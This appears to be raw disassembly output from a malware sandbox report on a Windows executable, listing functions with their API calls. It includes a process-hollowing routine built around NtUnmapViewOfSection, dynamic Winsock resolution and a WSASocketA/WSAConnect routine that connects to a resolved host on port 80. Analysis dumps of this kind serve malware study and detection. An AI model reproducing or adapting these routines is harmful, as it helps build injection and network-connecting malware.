004146DF mov byte ptr [0042C8A9h], 00000000h
004146E6 mov eax, dword ptr [ebp-04h]
004146E9 call 00404878h
004146EE push eax
004146EF call 00406244h LoadLibraryA@KERNEL32.DLL (Import)
004146F4 mov dword ptr [ebx], eax
004146F6 cmp dword ptr [ebx], 00000000h
004146F9 je 00414A61h
004146FF push 00414AC8h ASCII "WSAIoctl"
00414704 mov eax, dword ptr [ebx]
00414706 push eax
00414707 call 004061D4h
0041470C mov dword ptr [0042B45Ch], eax
00414711 push 00414AD4h ASCII "__WSAFDIsSet"
00414716 mov eax, dword ptr [ebx]
00414718 push eax
00414719 call 004061D4h
0041471E mov dword ptr [0042B458h], eax
00414723 push 00414AE4h ASCII "closesocket"
00414728 mov eax, dword ptr [ebx]
0041472A push eax
0041472B call 004061D4h
00414730 mov dword ptr [0042B438h], eax
00414735 push 00414AF0h ASCII "ioctlsocket"
0041473A mov eax, dword ptr [ebx]
0041473C push eax
0041473D call 004061D4h
00414742 mov dword ptr [0042B418h], eax
00414747 push 00414AFCh ASCII "WSAGetLastError"
0041474C mov eax, dword ptr [ebx]
0041474E push eax
0041474F call 004061D4h
00414754 mov dword ptr [0042B3D0h], eax
00414759 push 00414B0Ch ASCII "WSAStartup"
0041475E mov eax, dword ptr [ebx]
00414760 push eax
00414761 call 004061D4h
00414766 mov dword ptr [0042B3C8h], eax
0041476B push 00414B18h ASCII "WSACleanup"
00414770 mov eax, dword ptr [ebx]
00414772 push eax
00414773 call 004061D4h
00414778 mov dword ptr [0042B3CCh], eax
0041477D push 00414B24h ASCII "accept"
00414782 mov eax, dword ptr [ebx]
00414784 push eax
00414785 call 004061D4h
0041478A mov dword ptr [0042B440h], eax
0041478F push 00414B2Ch ASCII "bind"
00414794 mov eax, dword ptr [ebx]
00414796 push eax
00414797 call 004061D4h
0041479C mov dword ptr [0042B43Ch], eax
004147A1 push 00414B34h ASCII "connect"
004147A6 mov eax, dword ptr [ebx]
004147A8 push eax
004147A9 call 004061D4h
004147AE mov dword ptr [0042B434h], eax
004147B3 push 00414B3Ch ASCII "getpeername"
004147B8 mov eax, dword ptr [ebx]
004147BA push eax
004147BB call 004061D4h
004147C0 mov dword ptr [0042B430h], eax
004147C5 push 00414B48h ASCII "getsockname"
004147CA mov eax, dword ptr [ebx]
004147CC push eax
004147CD call 004061D4h
004147D2 mov dword ptr [0042B42Ch], eax
004147D7 push 00414B54h ASCII "getsockopt"
004147DC mov eax, dword ptr [ebx]
004147DE push eax
004147DF call 004061D4h
004147E4 mov dword ptr [0042B3F8h], eax
004147E9 push 00414B60h ASCII "htonl"
004147EE mov eax, dword ptr [ebx]
004147F0 push eax
004147F1 call 004061D4h
004147F6 mov dword ptr [0042B428h], eax
004147FB push 00414B68h ASCII "htons"
00414800 mov eax, dword ptr [ebx]
00414802 push eax
00414803 call 004061D4h
00414808 mov dword ptr [0042B424h], eax
0041480D push 00414B70h ASCII "inet_addr"
00414812 mov eax, dword ptr [ebx]
00414814 push eax
00414815 call 004061D4h
0041481A mov dword ptr [0042B420h], eax
0041481F push 00414B7Ch ASCII "inet_ntoa"
00414824 mov eax, dword ptr [ebx]
00414826 push eax
00414827 call 004061D4h
0041482C mov dword ptr [0042B41Ch], eax
00414831 push 00414B88h ASCII "listen"
00414836 mov eax, dword ptr [ebx]
00414838 push eax
00414839 call 004061D4h
0041483E mov dword ptr [0042B414h], eax
00414843 push 00414B90h ASCII "ntohl"
00414848 mov eax, dword ptr [ebx]
0041484A push eax
0041484B call 004061D4h
00414850 mov dword ptr [0042B410h], eax
00414855 push 00414B98h ASCII "ntohs"
0041485A mov eax, dword ptr [ebx]
0041485C push eax
0041485D call 004061D4h
00414862 mov dword ptr [0042B40Ch], eax
00414867 push 00414BA0h ASCII "recv"
0041486C mov eax, dword ptr [ebx]
0041486E push eax
0041486F call 004061D4h
00414874 mov dword ptr [0042B404h], eax
00414879 push 00414BA8h ASCII "recvfrom"
0041487E mov eax, dword ptr [ebx]
00414880 push eax
00414881 call 004061D4h
00414886 mov dword ptr [0042B408h], eax
0041488B push 00414BB4h ASCII "select"
00414890 mov eax, dword ptr [ebx]
00414892 push eax
00414893 call 004061D4h
00414898 mov dword ptr [0042B448h], eax
0041489D push 00414BBCh ASCII "send"
004148A2 mov eax, dword ptr [ebx]
004148A4 push eax
004148A5 call 004061D4h
004148AA mov dword ptr [0042B400h], eax
004148AF push 00414BC4h ASCII "sendto"
004148B4 mov eax, dword ptr [ebx]
004148B6 push eax
004148B7 call 004061D4h
004148BC mov dword ptr [0042B3FCh], eax
004148C1 push 00414BCCh ASCII "setsockopt"
004148C6 mov eax, dword ptr [ebx]
004148C8 push eax
004148C9 call 004061D4h
004148CE mov dword ptr [0042B3F4h], eax
004148D3 push 00414BD8h ASCII "shutdown"
004148D8 mov eax, dword ptr [ebx]
004148DA push eax
004148DB call 004061D4h
004148E0 mov dword ptr [0042B3F0h], eax
004148E5 push 00414BE4h ASCII "socket"
004148EA mov eax, dword ptr [ebx]
004148EC push eax
004148ED call 004061D4h
004148F2 mov dword ptr [0042B444h], eax
004148F7 push 00414BECh ASCII "gethostbyaddr"
004148FC mov eax, dword ptr [ebx]
004148FE push eax
004148FF call 004061D4h
00414904 mov dword ptr [0042B3E8h], eax
00414909 push 00414BFCh ASCII "gethostbyname"
0041490E mov eax, dword ptr [ebx]
00414910 push eax
00414911 call 004061D4h
00414916 mov dword ptr [0042B3E4h], eax
0041491B push 00414C0Ch ASCII "getprotobyname"
00414920 mov eax, dword ptr [ebx]
00414922 push eax
00414923 call 004061D4h
00414928 mov dword ptr [0042B3DCh], eax
0041492D push 00414C1Ch ASCII "getprotobynumber"
00414932 mov eax, dword ptr [ebx]
00414934 push eax
00414935 call 004061D4h
0041493A mov dword ptr [0042B3E0h], eax
0041493F push 00414C30h ASCII "getservbyname"
00414944 mov eax, dword ptr [ebx]
00414946 push eax
00414947 call 004061D4h
0041494C mov dword ptr [0042B3D4h], eax
00414951 push 00414C40h ASCII "getservbyport"
00414956 mov eax, dword ptr [ebx]
00414958 push eax
00414959 call 004061D4h
0041495E mov dword ptr [0042B3D8h], eax
00414963 push 00414C50h ASCII "gethostname"
00414968 mov eax, dword ptr [ebx]
0041496A push eax
0041496B call 004061D4h
00414970 mov dword ptr [0042B3ECh], eax
00414975 push 00414C5Ch ASCII "getaddrinfo"
0041497A mov eax, dword ptr [ebx]
0041497C push eax
0041497D call 004061D4h
00414982 mov dword ptr [0042B44Ch], eax
00414987 push 00414C68h ASCII "freeaddrinfo"
0041498C mov eax, dword ptr [ebx]
0041498E push eax
0041498F call 004061D4h
00414994 mov dword ptr [0042B450h], eax
00414999 push 00414C78h ASCII "getnameinfo"
0041499E mov eax, dword ptr [ebx]
004149A0 push eax
004149A1 call 004061D4h
004149A6 mov dword ptr [0042B454h], eax
004149AB cmp dword ptr [0042B44Ch], 00000000h
004149B2 je 004149C6h
004149B4 cmp dword ptr [0042B450h], 00000000h
004149BB je 004149C6h
004149BD cmp dword ptr [0042B454h], 00000000h
004149C4 jne 004149CAh
004149C6 xor eax, eax xrefs 004149B2, 004149BB
004149C8 jmp 004149CCh
004149CA mov al, 01h xrefs 004149C4
004149CC mov byte ptr [0042C8A8h], al xrefs 004149C8
004149D1 cmp byte ptr [0042C8A8h], 00000000h
004149D8 jne 00414A57h
004149DA push 00414C84h ASCII "wship6.dll"
004149DF call 00406244h
004149E4 mov dword ptr [0042B468h], eax
004149E9 cmp dword ptr [0042B468h], 00000000h
004149F0 je 00414A57h
004149F2 push 00414C5Ch ASCII "getaddrinfo"
004149F7 mov eax, dword ptr [0042B468h] 00000000
004149FC push eax
004149FD call 004061D4h
00414A02 mov dword ptr [0042B44Ch], eax
00414A07 push 00414C68h ASCII "freeaddrinfo"
00414A0C mov eax, dword ptr [0042B468h] 00000000
00414A11 push eax
00414A12 call 004061D4h
00414A17 mov dword ptr [0042B450h], eax
00414A1C push 00414C78h ASCII "getnameinfo"
00414A21 mov eax, dword ptr [0042B468h] 00000000
00414A26 push eax
00414A27 call 004061D4h
00414A2C mov dword ptr [0042B454h], eax
00414A31 cmp dword ptr [0042B44Ch], 00000000h
00414A38 je 00414A4Ch
00414A3A cmp dword ptr [0042B450h], 00000000h
00414A41 je 00414A4Ch
00414A43 cmp dword ptr [0042B454h], 00000000h
00414A4A jne 00414A50h
00414A4C xor eax, eax xrefs 00414A38, 00414A41
00414A4E jmp 00414A52h
00414A50 mov al, 01h xrefs 00414A4A
00414A52 mov byte ptr [0042C8A9h], al xrefs 00414A4E
00414A57 mov byte ptr [ebp-05h], 00000001h xrefs 004149D8, 004149F0
00414A5B jmp 00414A61h
00414A5D mov byte ptr [ebp-05h], 00000001h xrefs 004146D2
00414A61 cmp byte ptr [ebp-05h], 00000000h xrefs 004146F9, 00414A5B
00414A65 je 00414A6Dh
00414A67 inc dword ptr [0042B460h]
00414A6D xor eax, eax xrefs 00414A65
00414A6F pop edx
00414A71 pop ecx Count = 2
00414A72 mov dword ptr fs:[eax], edx
00414A75 push 00414A8Ch
00414A7A mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00414A8A
00414A7F call 0041391Ch
00414A84 ret function end
APIs
  • InitializeCriticalSection.KERNEL32, ref: 00401A1E
  • RtlEnterCriticalSection.NTDLL, ref: 00401A31
  • LocalAlloc.KERNEL32, ref: 00401A5B
  • RtlLeaveCriticalSection.NTDLL, ref: 00401AB8
Address Instruction Meta Information
00401A08 push ebp xrefs 0040229D, 00402108, 00402618
00401A09 mov ebp, esp
00401A0B xor edx, edx
00401A0D push ebp
00401A0E push 00401ABEh
00401A13 push dword ptr fs:[edx]
00401A16 mov dword ptr fs:[edx], esp
00401A19 push 0042C5C4h
00401A1E call 0040135Ch InitializeCriticalSection@KERNEL32.DLL (Hidden Import)
00401A23 cmp byte ptr [0042C045h], 00000000h
00401A2A je 00401A36h
00401A2C push 0042C5C4h
00401A31 call 00401364h RtlEnterCriticalSection@NTDLL.DLL (Hidden Import)
00401A36 mov eax, 0042C5E4h xrefs 00401A2A
00401A3B call 004013CCh
00401A40 mov eax, 0042C5F4h
00401A45 call 004013CCh
00401A4A mov eax, 0042C620h
00401A4F call 004013CCh
00401A54 push 00000FF8h
00401A59 push 00000000h
00401A5B call 0040133Ch LocalAlloc@KERNEL32.DLL (Hidden Import)
00401A60 mov dword ptr [0042C61Ch], eax
00401A65 cmp dword ptr [0042C61Ch], 00000000h
00401A6C je 00401A9Dh
00401A6E mov eax, 00000003h
00401A73 mov edx, dword ptr [0042C61Ch] 00000000 xrefs 00401A85
00401A79 xor ecx, ecx
00401A7B mov dword ptr [edx+eax*4-0Ch], ecx
00401A7F inc eax
00401A80 cmp eax, 00000401h
00401A85 jne 00401A73h
00401A87 mov eax, 0042C604h
00401A8C mov dword ptr [eax+04h], eax
00401A8F mov dword ptr [eax], eax
00401A91 mov dword ptr [0042C610h], eax
00401A96 mov byte ptr [0042C5BCh], 00000001h
00401A9D xor eax, eax xrefs 00401A6C
00401A9F pop edx
00401AA1 pop ecx Count = 2
00401AA2 mov dword ptr fs:[eax], edx
00401AA5 push 00401AC5h
00401AAA cmp byte ptr [0042C045h], 00000000h xrefs 00401AC3
00401AB1 je 00401ABDh
00401AB3 push 0042C5C4h
00401AB8 call 0040136Ch RtlLeaveCriticalSection@NTDLL.DLL (Hidden Import)
00401ABD ret xrefs 00401AB1 function end
Address Instruction Meta Information
0041F410 push ebx xrefs 0041F48B, 0041F497, 0041F4A8
0041F411 mov ebx, eax
0041F413 mov eax, ebx
0041F415 call 00404878h
0041F41A push eax
0041F41B call 00406244h
0041F420 pop ebx
0041F421 ret function end
Non-executed Functions
APIs
  • HeapFree.KERNEL32, ref: 004162F8
  • CloseHandle.KERNEL32, ref: 0041610D
Address Instruction Meta Information
004160F5 mov eax, dword ptr [esp+04h] xrefs 004155D9, 00415496
004160F9 push esi
004160FA mov esi, dword ptr [eax]
004160FC push eax
004160FD call 004162ECh
00416102 cmp esi, FFFFFFFFh
00416105 pop ecx
00416106 jne 0041610Ch
00416108 xor eax, eax
0041610A pop esi
0041610B ret function end
0041610C push esi xrefs 00416106
0041610D call dword ptr [00401004h] CloseHandle@KERNEL32.DLL (Import)
00416113 neg eax
00416115 sbb eax, eax
00416117 neg eax
00416119 dec eax
0041611A pop esi
0041611B ret function end
APIs
  • NtUnmapViewOfSection.NTDLL, ref: 0041430D
Address Instruction Meta Information
00414290 push ebp xrefs 004149BA
00414291 mov ebp, esp
00414293 sub esp, 00000348h
00414299 lea eax, dword ptr [ebp-00000340h]
0041429F push eax
004142A0 call 00414430h
004142A5 push eax
004142A6 call 00414450h
004142AB lea ecx, dword ptr [ebp-58h]
004142AE push ecx
004142AF call 00414470h
004142B4 mov edx, dword ptr [ebp+0Ch]
004142B7 mov dword ptr [ebp-68h], edx
004142BA mov eax, dword ptr [ebp-68h]
004142BD mov dword ptr [ebp-00000344h], eax
004142C3 mov ecx, dword ptr [ebp-00000344h]
004142C9 mov edx, dword ptr [ebp-68h]
004142CC add edx, dword ptr [ecx+3Ch]
004142CF mov dword ptr [ebp-64h], edx
004142D2 mov eax, dword ptr [ebp-64h]
004142D5 mov ecx, dword ptr [eax+34h]
004142D8 mov dword ptr [ebp-5Ch], ecx
004142DB mov edx, dword ptr [ebp-64h]
004142DE mov eax, dword ptr [edx+28h]
004142E1 mov dword ptr [ebp-6Ch], eax
004142E4 lea ecx, dword ptr [ebp-10h]
004142E7 push ecx
004142E8 lea edx, dword ptr [ebp-58h]
004142EB push edx
004142EE push 00000000h Count = 2
004142F0 push 00000024h
004142F6 push 00000000h Count = 3
004142F8 call 00414490h
004142FD push eax
004142FE push 00000000h
00414300 call 004144B0h
00414305 mov eax, dword ptr [ebp-5Ch]
00414308 push eax
00414309 mov ecx, dword ptr [ebp-10h]
0041430C push ecx
0041430D call dword ptr [00401070h] NtUnmapViewOfSection@NTDLL.DLL (Import)
00414313 push 00000004h
00414315 push 00003000h
0041431A mov edx, dword ptr [ebp-64h]
0041431D mov eax, dword ptr [edx+50h]
00414320 push eax
00414321 mov ecx, dword ptr [ebp-5Ch]
00414324 push ecx
00414325 mov edx, dword ptr [ebp-10h]
00414328 push edx
00414329 call 004144F0h
0041432E push 00000000h
00414330 mov eax, dword ptr [ebp-64h]
00414333 mov ecx, dword ptr [eax+54h]
00414336 push ecx
00414337 mov edx, dword ptr [ebp-68h]
0041433A push edx
0041433B mov eax, dword ptr [ebp-5Ch]
0041433E push eax
0041433F mov ecx, dword ptr [ebp-10h]
00414342 push ecx
00414343 call 00414520h
00414348 mov dword ptr [ebp-00000348h], 00000000h
00414352 jmp 00414363h
00414354 mov edx, dword ptr [ebp-00000348h] xrefs 004143B9
0041435A add edx, 01h
0041435D mov dword ptr [ebp-00000348h], edx
00414363 mov eax, dword ptr [ebp-64h] xrefs 00414352
00414366 movzx ecx, word ptr [eax+06h]
0041436A cmp dword ptr [ebp-00000348h], ecx
00414370 jnl 004143BBh
00414372 mov edx, dword ptr [ebp-00000344h]
00414378 mov eax, dword ptr [edx+3Ch]
0041437B mov ecx, dword ptr [ebp-68h]
0041437E lea edx, dword ptr [ecx+eax+000000F8h]
00414385 mov eax, dword ptr [ebp-00000348h]
0041438B imul eax, eax, 28h
0041438E add edx, eax
00414390 mov dword ptr [ebp-60h], edx
00414393 push 00000000h
00414395 mov ecx, dword ptr [ebp-60h]
00414398 mov edx, dword ptr [ecx+10h]
0041439B push edx
0041439C mov eax, dword ptr [ebp-60h]
0041439F mov ecx, dword ptr [ebp-68h]
004143A2 add ecx, dword ptr [eax+14h]
004143A5 push ecx
004143A6 mov edx, dword ptr [ebp-60h]
004143A9 mov eax, dword ptr [ebp-5Ch]
004143AC add eax, dword ptr [edx+0Ch]
004143AF push eax
004143B0 mov ecx, dword ptr [ebp-10h]
004143B3 push ecx
004143B4 call 00414520h
004143B9 jmp 00414354h
004143BB mov dword ptr [ebp-00000340h], 00010002h xrefs 00414370
004143C5 lea edx, dword ptr [ebp-00000340h]
004143CB push edx
004143CC mov eax, dword ptr [ebp-0Ch]
004143CF push eax
004143D0 call 00414450h
004143D5 push 00000000h
004143D7 push 00000004h
004143D9 lea ecx, dword ptr [ebp-5Ch]
004143DC push ecx
004143DD mov edx, dword ptr [ebp-0000029Ch]
004143E3 add edx, 08h
004143E6 push edx
004143E7 mov eax, dword ptr [ebp-10h]
004143EA push eax
004143EB call 00414520h
004143F0 mov ecx, dword ptr [ebp-5Ch]
004143F3 add ecx, dword ptr [ebp-6Ch]
004143F6 mov dword ptr [ebp-00000290h], ecx
004143FC lea edx, dword ptr [ebp-00000340h]
00414402 push edx
00414403 mov eax, dword ptr [ebp-0Ch]
00414406 push eax
00414407 call 00414550h
0041440C mov ecx, dword ptr [ebp-0Ch]
0041440F push ecx
00414410 call 00414570h
00414415 mov edx, dword ptr [ebp-68h]
00414418 push edx
00414419 call 00413F70h
0041441E push FFFFFFFFh
00414420 mov eax, dword ptr [ebp-10h]
00414423 push eax
00414424 call 00414590h
00414429 mov esp, ebp
0041442B pop ebp
0041442C ret function end
APIs
  • DeleteFileA.KERNEL32, ref: 0041609F
Address Instruction Meta Information
0041609B push dword ptr [esp+04h] xrefs 004155FD, 004154BA
0041609F call dword ptr [0040102Ch] DeleteFileA@KERNEL32.DLL (Import)
004160A5 neg eax
004160A7 sbb eax, eax
004160A9 inc eax
004160AA ret function end
APIs
  • HeapAlloc.KERNEL32, ref: 00415FFE
Address Instruction Meta Information
00415FF2 push dword ptr [esp+04h] xrefs 004145B9, 0041624E
00415FF6 push 00000000h
00415FF8 push dword ptr [00418CE0h]
00415FFE call dword ptr [00401000h] HeapAlloc@KERNEL32.DLL (Import)
00416004 ret function end
APIs
  • ExitProcess.KERNEL32, ref: 0041632D
Address Instruction Meta Information
004162FF call 0041635Bh xrefs 004161EA
00416304 push 00000000h
00416306 push 00401090h
0041630B push 0040108Ch
00416310 call 00416334h
00416315 push 00000000h
00416317 push 00401098h
0041631C push 00401094h
00416321 call 00416334h
00416326 add esp, 18h
00416329 push dword ptr [esp+04h]
0041632D call dword ptr [0040101Ch] ExitProcess@KERNEL32.DLL (Import)
00416333 int3
APIs
    • WriteFile.KERNEL32, ref: 004162D0
  • wvsprintfA.USER32, ref: 004160DC
Address Instruction Meta Information
004160BE push ebp xrefs 004155CA, 0041548A
004160BF mov ebp, esp
004160C1 sub esp, 00000400h
004160C7 lea eax, dword ptr [ebp+10h]
004160CA push eax
004160CB push dword ptr [ebp+0Ch]
004160CE lea eax, dword ptr [ebp-00000400h]
004160D4 push eax
004160D5 mov byte ptr [ebp-00000400h], 00000000h
004160DC call dword ptr [00401034h] wvsprintfA@USER32.DLL (Import)
004160E2 push dword ptr [ebp+08h]
004160E5 lea eax, dword ptr [ebp-00000400h]
004160EB push eax
004160EC call 004162AFh
004160F2 pop ecx Count = 2
004160F3 leave
004160F4 ret function end
APIs
    • ExitProcess.KERNEL32, ref: 0041632D
  • ExitProcess.KERNEL32, ref: 0041614F
  • GetCommandLineA.KERNEL32, ref: 0041616A
  • GetStartupInfoA.KERNEL32, ref: 004161B3
  • GetModuleHandleA.KERNEL32, ref: 004161DD
Address Instruction Meta Information
0041611C push ebp
0041611D mov ebp, esp
0041611F sub esp, 44h
00416122 mov eax, dword ptr [00418CE4h] 00000000
00416127 test eax, eax
00416129 je 00416135h
0041612B call eax
0041612D test eax, eax
0041612F jne 00416135h
00416131 push FFFFFFFEh
00416133 jmp 0041614Fh
00416135 push 00000001h xrefs 00416129, 0041612F
00416137 push 00401088h
0041613C push 00401080h
00416141 call 00416334h
00416146 add esp, 0Ch
00416149 test eax, eax
0041614B je 00416155h
0041614D push FFFFFFFDh
0041614F call dword ptr [0040101Ch] ExitProcess@KERNEL32.DLL (Import) xrefs 00416133
00416155 push esi xrefs 0041614B
00416156 push 00000000h
00416158 push 0040107Ch
0041615D push 00401078h
00416162 call 00416334h
00416167 add esp, 0Ch
0041616A call dword ptr [00401020h] GetCommandLineA@KERNEL32.DLL (Import)
00416170 mov esi, eax
00416172 test esi, esi
00416174 jne 0041617Bh
00416176 mov esi, 00411970h
0041617B mov cl, 20h xrefs 00416174
0041617D jmp 00416184h
0041617F cmp al, 20h xrefs 00416188
00416181 jnbe 0041618Eh
00416183 inc esi
00416184 mov al, byte ptr [esi] xrefs 0041617D
00416186 test al, al
00416188 jne 0041617Fh
0041618A cmp al, 20h
0041618C jbe 004161A5h
0041618E mov al, byte ptr [esi] xrefs 00416181
00416190 cmp al, 22h xrefs 0041619C
00416192 jne 00416197h
00416194 xor cl, 00000020h
00416197 inc esi xrefs 00416192
00416198 mov al, byte ptr [esi]
0041619A cmp al, cl
0041619C jnbe 00416190h
0041619E jmp 004161A5h
004161A0 cmp al, cl xrefs 004161A9
004161A2 jnbe 004161ABh
004161A4 inc esi
004161A5 mov al, byte ptr [esi] xrefs 0041619E, 0041618C
004161A7 test al, al
004161A9 jne 004161A0h
004161AB and dword ptr [ebp-18h], 00000000h xrefs 004161A2
004161AF lea eax, dword ptr [ebp-44h]
004161B2 push eax
004161B3 call dword ptr [00401024h] GetStartupInfoA@KERNEL32.DLL (Import)
004161B9 test eax, 0A0D0A0Dh
004161BE sub eax, 54524357h
004161C3 sub eax, 0A0D0A0Dh
004161C8 test byte ptr [ebp-18h], 00000001h
004161CC je 004161D4h
004161CE movzx eax, word ptr [ebp-14h]
004161D2 jmp 004161D7h
004161D4 push 0000000Ah xrefs 004161CC
004161D6 pop eax
004161D7 push eax xrefs 004161D2
004161D8 push esi
004161DB push 00000000h Count = 2
004161DD call dword ptr [00401028h] GetModuleHandleA@KERNEL32.DLL (Import)
004161E3 push eax
004161E4 call 004147E0h
004161E9 push eax
004161EA call 004162FFh
004161EF pop ecx
004161F0 pop esi
004161F1 leave
004161F2 ret function end
APIs
  • GetProcessHeap.KERNEL32, ref: 004161F3
Address Instruction Meta Information
004161F3 call dword ptr [00401018h] GetProcessHeap@KERNEL32.DLL (Import)
004161F9 xor ecx, ecx
004161FB test eax, eax
004161FD sete cl
00416200 mov dword ptr [00418CE0h], eax
00416205 mov eax, ecx
00416207 ret function end
APIs
  • #115.WS2_32, ref: 00414BB5
  • WSASocketA.WS2_32, ref: 00414BC7
  • #116.WS2_32, ref: 00414BDC
  • #52.WS2_32, ref: 00414BEE
  • #116.WS2_32, ref: 00414C03
  • #9.WS2_32, ref: 00414C10
  • #12.WS2_32, ref: 00414C37
  • #11.WS2_32, ref: 00414C3E
  • WSAConnect.WS2_32, ref: 00414C62
  • #116.WS2_32, ref: 00414C6D
Address Instruction Meta Information
00414BA0 push ebp xrefs 00414DF0
00414BA1 mov ebp, esp
00414BA3 sub esp, 000001A8h
00414BA9 lea eax, dword ptr [ebp-00000190h]
00414BAF push eax
00414BB0 push 00000202h
00414BB5 call dword ptr [00401048h] #115@WS2_32.DLL (Import)
00414BBF push 00000000h Count = 3
00414BC1 push 00000006h
00414BC3 push 00000001h
00414BC5 push 00000002h
00414BC7 call dword ptr [00401068h] WSASocketA@WS2_32.DLL (Import)
00414BCD mov dword ptr [ebp-00000194h], eax
00414BD3 cmp dword ptr [ebp-00000194h], FFFFFFFFh
00414BDA jne 00414BEAh
00414BDC call dword ptr [00401058h] #116@WS2_32.DLL (Import)
00414BE2 or eax, FFFFFFFFh
00414BE5 jmp 00414C7Eh
00414BEA mov ecx, dword ptr [ebp+08h] xrefs 00414BDA
00414BED push ecx
00414BEE call dword ptr [00401060h] #52@WS2_32.DLL (Import)
00414BF4 mov dword ptr [ebp-00000198h], eax
00414BFA cmp dword ptr [ebp-00000198h], 00000000h
00414C01 jne 00414C0Eh
00414C03 call dword ptr [00401058h] #116@WS2_32.DLL (Import)
00414C09 or eax, FFFFFFFFh
00414C0C jmp 00414C7Eh
00414C0E push 00000050h xrefs 00414C01
00414C10 call dword ptr [00401054h] #9@WS2_32.DLL (Import)
00414C16 mov word ptr [ebp-000001A6h], ax
00414C1D mov edx, 00000002h
00414C22 mov word ptr [ebp-000001A8h], dx
00414C29 mov eax, dword ptr [ebp-00000198h]
00414C2F mov ecx, dword ptr [eax+0Ch]
00414C32 mov edx, dword ptr [ecx]
00414C34 mov eax, dword ptr [edx]
00414C36 push eax
00414C37 call dword ptr [00401044h] #12@WS2_32.DLL (Import)
00414C3D push eax
00414C3E call dword ptr [0040104Ch] #11@WS2_32.DLL (Import)
00414C44 mov dword ptr [ebp-000001A4h], eax
00414C50 push 00000000h Count = 4
00414C52 push 00000010h
00414C54 lea ecx, dword ptr [ebp-000001A8h]
00414C5A push ecx
00414C5B mov edx, dword ptr [ebp-00000194h]
00414C61 push edx
00414C62 call dword ptr [00401050h] WSAConnect@WS2_32.DLL (Import)
00414C68 cmp eax, FFFFFFFFh
00414C6B jne 00414C78h
00414C6D call dword ptr [00401058h] #116@WS2_32.DLL (Import)
00414C73 or eax, FFFFFFFFh
00414C76 jmp 00414C7Eh
00414C78 mov eax, dword ptr [ebp-00000194h] xrefs 00414C6B
00414C7E mov esp, ebp xrefs 00414C76, 00414C0C, 00414BE5
00414C80 pop ebp
00414C81 ret function end
APIs
  • InternetGetConnectedState.WININET, ref: 00414B8A
Address Instruction Meta Information
00414B80 push ebp xrefs 0041493D
00414B81 mov ebp, esp
00414B83 push ecx
00414B84 push 00000000h
00414B86 lea eax, dword ptr [ebp-04h]
00414B89 push eax
00414B8A call dword ptr [0040103Ch] InternetGetConnectedState@WININET.DLL (Import)
00414B90 neg eax
00414B92 sbb eax, eax
00414B94 neg eax
00414B96 mov esp, ebp
00414B98 pop ebp
00414B99 ret function end
APIs
    • HeapAlloc.KERNEL32, ref: 00415FFE
    • HeapFree.KERNEL32, ref: 004162F8
  • CloseHandle.KERNEL32, ref: 0041621C
  • CreateFileA.KERNEL32, ref: 00416288
  • SetFilePointer.KERNEL32, ref: 004162A1
Address Instruction Meta Information
00416208 push esi xrefs 004160B5
00416209 mov esi, dword ptr [esp+10h]
0041620D push edi
0041620E xor edi, edi
00416210 cmp esi, edi
00416212 je 0041624Ch
00416214 mov eax, dword ptr [esi]
00416216 cmp eax, FFFFFFFFh
00416219 je 00416222h
0041621B push eax
0041621C call dword ptr [00401004h] CloseHandle@KERNEL32.DLL (Import)
00416222 or dword ptr [esi], FFFFFFFFh xrefs 00416258, 00416219
00416225 or dword ptr [esi+04h], FFFFFFFFh
00416229 push ebx
0041622A mov ebx, dword ptr [esp+14h]
0041622E mov al, byte ptr [ebx]
00416230 cmp al, 61h
00416232 mov edx, C0000000h
00416237 je 00416270h
00416239 cmp al, 72h
0041623B je 00416267h
0041623D cmp al, 77h
0041623F je 0041625Eh
00416241 push esi xrefs 00416293
00416242 call 004162ECh
00416247 pop ecx
00416248 xor eax, eax
0041624A jmp 004162ABh
0041624C push 00000008h xrefs 00416212
0041624E call 00415FF2h
00416253 mov esi, eax
00416255 cmp esi, edi
00416257 pop ecx
00416258 jne 00416222h
0041625A xor eax, eax
0041625C jmp 004162ACh
0041625E mov eax, 40000000h xrefs 0041623F
00416263 push 00000002h
00416265 jmp 00416274h
00416267 mov eax, 80000000h xrefs 0041623B
0041626C push 00000003h
0041626E jmp 00416274h
00416270 mov eax, edx xrefs 00416237
00416272 push 00000004h
00416274 cmp byte ptr [ebx+01h], 0000002Bh xrefs 0041626E, 00416265
00416278 pop ecx
00416279 jne 0041627Dh
0041627B mov eax, edx
0041627E push edi Count = 2
0041627F push ecx
00416280 push edi
00416281 push 00000003h
00416283 push eax
00416284 push dword ptr [esp+28h]
00416288 call dword ptr [00401010h] CreateFileA@KERNEL32.DLL (Import)
0041628E mov edi, eax
00416290 cmp edi, FFFFFFFFh
00416293 je 00416241h
00416295 cmp byte ptr [ebx], 00000061h
00416298 jne 004162A7h
0041629A push 00000002h
0041629E push 00000000h Count = 2
004162A0 push edi
004162A1 call dword ptr [00401014h] SetFilePointer@KERNEL32.DLL (Import)
004162A7 mov dword ptr [esi], edi xrefs 00416298
004162A9 mov eax, esi
004162AB pop ebx xrefs 0041624A
004162AC pop edi xrefs 0041625C
004162AD pop esi
004162AE ret function end
APIs
  • WriteFile.KERNEL32, ref: 004162D0
Address Instruction Meta Information
004162AF push ebp xrefs 004160EC
004162B0 mov ebp, esp
004162B2 mov eax, dword ptr [ebp+08h]
004162B5 push esi
004162B6 xor ecx, ecx
004162B8 xor esi, esi
004162BA cmp byte ptr [eax], cl
004162BC je 004162C4h
004162BE inc esi xrefs 004162C2
004162BF cmp byte ptr [esi+eax], cl
004162C2 jne 004162BEh
004162C4 push ecx xrefs 004162BC
004162C5 lea ecx, dword ptr [ebp+08h]
004162C8 push ecx
004162C9 push esi
004162CA push eax
004162CB mov eax, dword ptr [ebp+0Ch]
004162CE push dword ptr [eax]
004162D0 call dword ptr [0040100Ch] WriteFile@KERNEL32.DLL (Import)
004162D6 test eax, eax
004162D8 jne 004162DFh
004162DA or eax, FFFFFFFFh
004162DD jmp 004162E9h
004162DF mov eax, dword ptr [ebp+08h] xrefs 004162D8
004162E2 cmp eax, esi
004162E4 je 004162E9h
004162E6 or eax, FFFFFFFFh
004162E9 pop esi xrefs 004162E4, 004162DD
004162EA pop ebp
004162EB ret function end
APIs
  • HeapFree.KERNEL32, ref: 004162F8
Address Instruction Meta Information
004162EC push dword ptr [esp+04h] xrefs 00416242, 004160FD
004162F0 push 00000000h
004162F2 push dword ptr [00418CE0h]
004162F8 call dword ptr [00401008h] HeapFree@KERNEL32.DLL (Import)
004162FE ret function end
APIs
    • #115.WS2_32, ref: 00414BB5
    • WSASocketA.WS2_32, ref: 00414BC7
    • #116.WS2_32, ref: 00414BDC
    • #52.WS2_32, ref: 00414BEE
    • #116.WS2_32, ref: 00414C03
    • #9.WS2_32, ref: 00414C10
